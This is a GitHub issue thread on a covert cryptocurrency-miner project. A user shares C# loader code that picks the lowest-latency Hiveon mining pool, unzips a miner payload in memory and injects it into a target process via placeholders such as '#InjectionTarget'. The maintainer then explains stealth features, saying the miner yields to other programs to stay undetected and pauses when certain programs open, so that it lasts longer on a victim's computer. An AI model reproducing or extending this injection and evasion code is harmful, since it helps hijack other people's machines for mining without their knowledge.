### ISSUE TITLE
Code to solve ping problem and question about fee

### ISSUE THREAD

**Issue by 0x77777** [UnamSanctam/SilentXMRMiner#417]
Ping source for anyone who wants:
`try
                    {
                        string lk1 = "ru-eth.hiveon.net";
                        string lk2 = "eu-eth.hiveon.net";
                        string lk3 = "naw-eth.hiveon.net";
                        string lk4 = "aspac1-eth.hiveon.net";
                        string lk5 = "usw-eth.hiveon.net";
                        string lk6 = "use-eth.hiveon.net";
                        
                        long i1 = new System.Net.NetworkInformation.Ping().Send(lk1).RoundtripTime;
                        long i2 = new System.Net.NetworkInformation.Ping().Send(lk2).RoundtripTime;
                        long i3 = new System.Net.NetworkInformation.Ping().Send(lk3).RoundtripTime;
                        long i4 = new System.Net.NetworkInformation.Ping().Send(lk4).RoundtripTime;
                        long i5 = new System.Net.NetworkInformation.Ping().Send(lk5).RoundtripTime;
                        long i6 = new System.Net.NetworkInformation.Ping().Send(lk6).RoundtripTime;
                        long[] iall = { i1, i2, i3, i4, i5, i6 };
                        
                        if (i1 < i2  & i1 < i3 & i1 < i4 & i1 < i5 & i1 < i6) //System.Linq (Min) doesn't compile
                        {
                            ppp = lk1 + ":4444";
                        }
                        else if (i2 < i3 & i2 < i4 & i2 < i5 & i2 < i6)
                        {
                            ppp = lk2 + ":4444";
                        }
                        else if (i3 < i4 & i3 < i5 & i3 <i6)
                        {
                            ppp = lk3 + ":4444";
                        }
                        else if (i4 < i5 & i4 < i6)
                        {
                            ppp = lk4 + ":4444";
                        }
                        else if (i5 < i6)
                        {
                            ppp = lk5 + ":4444";

                        }
                        else 
                        {
                            ppp = lk6 + ":4444";
                        }
                    }
                    catch
                    {
                        ppp = "eu-eth.hiveon.net:4444";
                    }
                    using (var archive = new ZipArchive(new MemoryStream(reT)))
                    {
                        foreach (ZipArchiveEntry entry in archive.Entries)
                        {
                            if (entry.FullName.Contains("et"))
                            {
                                using (var streamdata = entry.Open())
                                {
                                    using (var ms = new MemoryStream())
                                    {
                                        streamdata.CopyTo(ms);
                                        
                                        RRun(ms.ToArray(), ("#InjectionDir") + @"\" + RGetString("#InjectionTarget"), RGetString("#ARGSTR").Replace("$$$", ppp)); // Replace the $$$ placed on pool settings
                                        
                                    }
                                }
                            }
                        }
                    }//i use it thay because its faster to code, dont need to change form and stuff` 
    
And my question is if the mine has fee for u and whats is the best pool in your opinion, i think hiveon is automatic stolen some eth and etc  from balance, its little but it seems to yield lees than the others

thanks for your contribution and your time, u are a great man

**Comment by 0x77777** [comment]
lmao i posted on the wrong miner, sorry

**Comment by UnamSanctam** [comment]
I can answer it here anyways, the ETH miner shouldn't have any fees since there aren't any in the base and I haven't added any specifically. Not sure about Hiveon since I've never used it but you could also use higher "Max GPU" settings if you don't already if you want it to mine more. Could also have to do with the client opening "Stealth Target" programs if you have "Stealth" enabled. The miner is also designed to partly yield to other programs so that it's less detectable since I believe it is more worth to have the miner survive on a computer for longer even if you get some lower hashrate, I've seen a lot of other miners that makes things lag on some cards or computers due to them not respecting other programs very much.

**Comment by 0x77777** [comment]
ok thanks
a suggestion for the next update would be to add a max usage on when the stealth mode enable, to be not 0% but 20% 30% or something like that

**Comment by UnamSanctam** [comment]
Wouldn't make much sense since Max GPU is only really used to reduce the fan sound/temperature, the major part of "Stealth" is to  stop using the VRAM which of course you can only do by pausing the miner.

**Comment by 0x77777** [comment]
yeah, this make sense
